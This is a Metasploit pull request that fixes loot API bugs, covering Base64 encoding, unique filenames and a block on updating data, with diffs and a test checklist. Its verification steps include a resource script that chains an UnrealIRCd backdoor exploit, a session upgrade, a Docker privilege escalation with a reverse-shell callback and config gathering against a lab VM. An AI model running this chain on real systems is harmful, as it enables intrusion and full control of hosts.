### PR TITLE
Fix Miscellaneous Loot Bugs

### DIFF
--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -20,7 +20,7 @@ module LootApiDoc
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
 
   # Some of the attributes expect different data when doing a create.
-  CREATE_PATH_DESC = 'The name to give the file on the server.'
+  CREATE_PATH_DESC = 'The name to give the file on the server. Note that this will prepend a unique string to the given value.'
   CREATE_PATH_EXAMPLE = 'password_file.txt'
 
 # Swagger documentation for loot model

--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -18,6 +18,11 @@ module LootApiDoc
   INFO_DESC = 'Information about the loot.'
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
 
+  # Some of the attributes expect different data when doing a create.
+  CREATE_DATA_DESC = "Base64 encoded copy of the file's contents."
+  CREATE_DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
+  CREATE_PATH_DESC = 'The name to give the file on the server.'
+  CREATE_PATH_EXAMPLE = 'password_file.txt'
 
 # Swagger documentation for loot model
   swagger_schema :Loot do
@@ -87,8 +92,8 @@ module LootApiDoc
           property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
           property :service,  '$ref': :Service
           property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
-          property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
-          property :data, type: :string, description: DATA_DESC
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :data, type: :string, description: CREATE_DATA_DESC, example: CREATE_DATA_EXAMPLE
           property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
           property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
           property :info, type: :string, description: INFO_DESC

--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -20,7 +20,7 @@ module LootApiDoc
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
 
   # Some of the attributes expect different data when doing a create.
-  CREATE_PATH_DESC = 'The name to give the file on the server. Note that this will prepend a unique string to the given value.'
+  CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
   CREATE_PATH_EXAMPLE = 'password_file.txt'
 
 # Swagger documentation for loot model

--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -10,7 +10,8 @@ module LootApiDoc
   LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
   PATH_DESC = 'The on-disk path to the loot file.'
   PATH_EXAMPLE = '/path/to/file.txt'
-  DATA_DESC = 'The contents of the file.'
+  DATA_DESC = "Base64 encoded copy of the file's contents."
+  DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
   CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}.  Used to server the file correctly so browsers understand whether to render or download the file.'
   CONTENT_TYPE_EXAMPLE = 'text/plain'
   NAME_DESC = 'The name of the loot.'
@@ -19,8 +20,6 @@ module LootApiDoc
   MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
 
   # Some of the attributes expect different data when doing a create.
-  CREATE_DATA_DESC = "Base64 encoded copy of the file's contents."
-  CREATE_DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
   CREATE_PATH_DESC = 'The name to give the file on the server.'
   CREATE_PATH_EXAMPLE = 'password_file.txt'
 
@@ -33,7 +32,7 @@ module LootApiDoc
     property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
     property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
     property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
-    property :data, type: :string, description: DATA_DESC
+    property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
     property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
     property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
     property :info, type: :string, description: INFO_DESC
@@ -93,7 +92,7 @@ module LootApiDoc
           property :service,  '$ref': :Service
           property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
           property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
-          property :data, type: :string, description: CREATE_DATA_DESC, example: CREATE_DATA_EXAMPLE
+          property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
           property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
           property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
           property :info, type: :string, description: INFO_DESC

--- a/documentation/api/v1/loot_api_doc.rb
+++ b/documentation/api/v1/loot_api_doc.rb
@@ -210,7 +210,14 @@ module LootApiDoc
         key :description, 'The updated attributes to overwrite to the loot.'
         key :required, true
         schema do
-          key :'$ref', :Loot
+          property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
+          property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
+          property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
+          property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
+          property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
+          property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
+          property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
+          property :info, type: :string, description: INFO_DESC
         end
       end
 

--- a/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
+++ b/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
@@ -16,6 +16,11 @@ module RemoteLootDataService
         local_path = File.join(Msf::Config.loot_directory, File.basename(loot.path))
         loot.path = process_file(loot.data, local_path)
       end
+      if loot.host_id
+        host_opts = { id: loot.host_id }
+        host_path = get_path_select(host_opts, RemoteHostDataService::HOST_API_PATH)
+        loot.host = json_to_mdm_object(self.get_data(host_path, nil, host_opts), RemoteHostDataService::HOST_MDM_CLASS).first
+      end
     end
     loots
   end

--- a/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
+++ b/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
@@ -14,7 +14,7 @@ module RemoteLootDataService
     data = parsed_body[:data]
     data.each do |loot|
       # TODO: Add an option to toggle whether the file data is returned or not
-      if loot[:data]
+      if loot[:data] && !loot[:data].empty?
         local_path = File.join(Msf::Config.loot_directory, File.basename(loot[:path]))
         rv[data.index(loot)].path = process_file(loot[:data], local_path)
       end

--- a/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
+++ b/lib/metasploit/framework/data_service/remote/http/remote_loot_data_service.rb
@@ -8,21 +8,22 @@ module RemoteLootDataService
 
   def loot(opts = {})
     path = get_path_select(opts, LOOT_API_PATH)
-    # TODO: Add an option to toggle whether the file data is returned or not
-    loots = json_to_mdm_object(self.get_data(path, nil, opts), LOOT_MDM_CLASS, [])
-    # Save a local copy of the file
-    loots.each do |loot|
-      if loot.data
-        local_path = File.join(Msf::Config.loot_directory, File.basename(loot.path))
-        loot.path = process_file(loot.data, local_path)
+    data = self.get_data(path, nil, opts)
+    rv = json_to_mdm_object(data, LOOT_MDM_CLASS, [])
+    parsed_body = JSON.parse(data.response.body, symbolize_names: true)
+    data = parsed_body[:data]
+    data.each do |loot|
+      # TODO: Add an option to toggle whether the file data is returned or not
+      if loot[:data]
+        local_path = File.join(Msf::Config.loot_directory, File.basename(loot[:path]))
+        rv[data.index(loot)].path = process_file(loot[:data], local_path)
       end
-      if loot.host_id
-        host_opts = { id: loot.host_id }
-        host_path = get_path_select(host_opts, RemoteHostDataService::HOST_API_PATH)
-        loot.host = json_to_mdm_object(self.get_data(host_path, nil, host_opts), RemoteHostDataService::HOST_MDM_CLASS).first
+      if loot[:host]
+        host_object = to_ar(RemoteHostDataService::HOST_MDM_CLASS.constantize, loot[:host])
+        rv[data.index(loot)].host = host_object
       end
     end
-    loots
+    rv
   end
 
   def report_loot(opts)

--- a/lib/msf/core/db_manager/loot.rb
+++ b/lib/msf/core/db_manager/loot.rb
@@ -99,6 +99,7 @@ module Msf::DBManager::Loot
   def update_loot(opts)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
+      raise ArgumentError, "Updating the data attribute is not allowed." if opts[:data]
       opts[:workspace] = wspace if wspace
 
       id = opts.delete(:id)

--- a/lib/msf/core/db_manager/loot.rb
+++ b/lib/msf/core/db_manager/loot.rb
@@ -99,7 +99,7 @@ module Msf::DBManager::Loot
   def update_loot(opts)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
-      raise ArgumentError, "Updating the data attribute is not allowed." if opts[:data]
+      raise ArgumentError, "Updating the data attribute is not permitted." if opts[:data]
       opts[:workspace] = wspace if wspace
 
       id = opts.delete(:id)

--- a/lib/msf/core/db_manager/loot.rb
+++ b/lib/msf/core/db_manager/loot.rb
@@ -10,17 +10,17 @@ module Msf::DBManager::Loot
   # This methods returns a list of all loot in the database
   #
   def loots(opts)
-    data = opts.delete(:data)
-    # Remove path from search conditions as this won't accommodate remote data
-    # service usage where the client and server storage locations differ.
-    opts.delete(:path)
-    search_term = opts.delete(:search_term)
-
     ::ActiveRecord::Base.connection_pool.with_connection {
       # If we have the ID, there is no point in creating a complex query.
       if opts[:id] && !opts[:id].to_s.empty?
         return Array.wrap(Mdm::Loot.find(opts[:id]))
       end
+
+      # Remove path from search conditions as this won't accommodate remote data
+      # service usage where the client and server storage locations differ.
+      opts.delete(:path)
+      search_term = opts.delete(:search_term)
+      data = opts.delete(:data)
 
       wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
       opts[:workspace_id] = wspace.id

--- a/lib/msf/core/db_manager/loot.rb
+++ b/lib/msf/core/db_manager/loot.rb
@@ -105,6 +105,13 @@ module Msf::DBManager::Loot
 
       id = opts.delete(:id)
       loot = Mdm::Loot.find(id)
+
+      # If the user updates the path attribute (or filename) we need to update the file
+      # on disk to reflect that.
+      if opts[:path] && File.exists?(loot.path)
+        File.rename(loot.path, opts[:path])
+      end
+
       loot.update!(opts)
       return loot
     }

--- a/lib/msf/core/db_manager/loot.rb
+++ b/lib/msf/core/db_manager/loot.rb
@@ -99,6 +99,7 @@ module Msf::DBManager::Loot
   def update_loot(opts)
     ::ActiveRecord::Base.connection_pool.with_connection {
       wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
+      # Prevent changing the data field to ensure the file contents remain the same as what was originally looted.
       raise ArgumentError, "Updating the data attribute is not permitted." if opts[:data]
       opts[:workspace] = wspace if wspace
 

--- a/lib/msf/core/web_services/servlet/host_servlet.rb
+++ b/lib/msf/core/web_services/servlet/host_servlet.rb
@@ -30,9 +30,8 @@ module HostServlet
       begin
         sanitized_params = sanitize_params(params, env['rack.request.query_hash'])
         data = get_db.hosts(sanitized_params)
-        includes = [:loots]
         data = data.first if is_single_object?(data, sanitized_params)
-        set_json_data_response(response: data, includes: includes)
+        set_json_data_response(response: data)
       rescue => e
         print_error_and_create_response(error: e, message: 'There was an error retrieving hosts:', code: 500)
       end

--- a/lib/msf/core/web_services/servlet/loot_servlet.rb
+++ b/lib/msf/core/web_services/servlet/loot_servlet.rb
@@ -41,7 +41,7 @@ module LootServlet
       job = lambda { |opts|
         if opts[:data]
           filename = File.basename(opts[:path])
-          local_path = File.join(Msf::Config.loot_directory, filename)
+          local_path = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
           opts[:path] = process_file(opts[:data], local_path)
           opts[:data] = Base64.urlsafe_decode64(opts[:data])
         end
@@ -60,6 +60,10 @@ module LootServlet
         opts = parse_json_request(request, false)
         tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
+        if opts[:path]
+          filename = File.basename(opts[:path])
+          opts[:path] = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
+        end
         data = get_db.update_loot(opts)
         data = encode_loot_data(data)
         set_json_data_response(response: data)

--- a/lib/msf/core/web_services/servlet/loot_servlet.rb
+++ b/lib/msf/core/web_services/servlet/loot_servlet.rb
@@ -60,7 +60,11 @@ module LootServlet
         opts = parse_json_request(request, false)
         tmp_params = sanitize_params(params)
         opts[:id] = tmp_params[:id] if tmp_params[:id]
-        if opts[:path]
+        db_record = get_db.loots(opts).first
+        # Give the file a unique name to prevent accidental overwrites. Only do this if there is actually a file
+        # on disk. If there is not a file on disk we assume that this DB record is for tracking a file outside
+        # of metasploit, so we don't want to assign them a unique file name and overwrite that.
+        if opts[:path] && File.exists?(db_record.path)
           filename = File.basename(opts[:path])
           opts[:path] = File.join(Msf::Config.loot_directory, "#{SecureRandom.hex(10)}-#{filename}")
         end

--- a/lib/msf/core/web_services/servlet_helper.rb
+++ b/lib/msf/core/web_services/servlet_helper.rb
@@ -131,6 +131,13 @@ module ServletHelper
     response
   end
 
+  def encode_loot_data(data)
+    Array.wrap(data).each do |loot|
+      loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
+    end
+    data
+  end
+
   # Get Warden::Proxy object from the Rack environment.
   # @return [Warden::Proxy] The Warden::Proxy object from the Rack environment.
   def warden

--- a/lib/msf/core/web_services/servlet_helper.rb
+++ b/lib/msf/core/web_services/servlet_helper.rb
@@ -133,7 +133,7 @@ module ServletHelper
 
   def encode_loot_data(data)
     Array.wrap(data).each do |loot|
-      loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
+      loot.data = Base64.urlsafe_encode64(loot.data) if loot.data && !loot.data.empty?
     end
     data
   end


### PR DESCRIPTION
This PR makes a number of fixes to bugs that existed around the loot API endpoint. They were originally reported in MS-3755. The following fixes are included:
* Update the docs to indicate the `data` field should be Base64 encoded.
* Updated the docs to indicate that the `path` field on create and update is just the filename.
* If a host with the same `id` existed in a local database, that information would be displayed instead of the data returned from the remote data service.
* Remove the ability to update the `data` field. This is to ensure integrity for the original looted files.
* Some endpoints didn't properly Base64 encode the `data` field.
* Handle return of empty `data` fields.
* Create and update operations on the remote data service will now prepend a unique string to the filename to prevent accidentally overwriting files when they have the same name.
* Remove the nested loot JSON from host objects. It wasn't actually being used anywhere.

## Verification

List the steps needed to make sure this thing works
- [x] Start `msfdb` on a true remote system such as a VM.
  - [x] Testing through `msfconsole
  - [x] Start `msfconsole`
  - [x] Connect to the remote data service using `db_connect`
  - [x] Load up metasploitable3 and run the following resource script:
  ```
  use exploit/unix/irc/unreal_ircd_3281_backdoor
  set RHOST 172.28.128.3
  set RPORT 6697
  exploit -z
  sleep 5
  sessions -u 1
  sleep 5
  use exploit/linux/local/docker_daemon_privilege_escalation
  set SESSION 2
  set LHOST 172.28.128.1
  set LPORT 4445
  exploit
  ```
  - [x] `use post/linux/gather/enum_configs` `set SESSION 3` `run`
  - [x] Run the `loot` command. Verify the output is correct. Ensure the host value is correct.
  - [x] Open `~/.msf4/loot` on the server and verify the loot files are present with the correct contents
- [x] Test through the API
  - [x] Open the API docs `<server address>:<port>/api/v1/api-docs`
  - [x] Verify the loot data models under create and update look correct.
  - [x] Create a loot object. Verify that it is successfully created and the file is created on the remote server
  - [ ] Update that loot object. Verify that the operation completes successfully. Ensure you are changing the `path` attribute` and that it gets a new unique string.
  - [x] Create a loot object with an empty `data` field. Run a GET and verify it displays correctly.

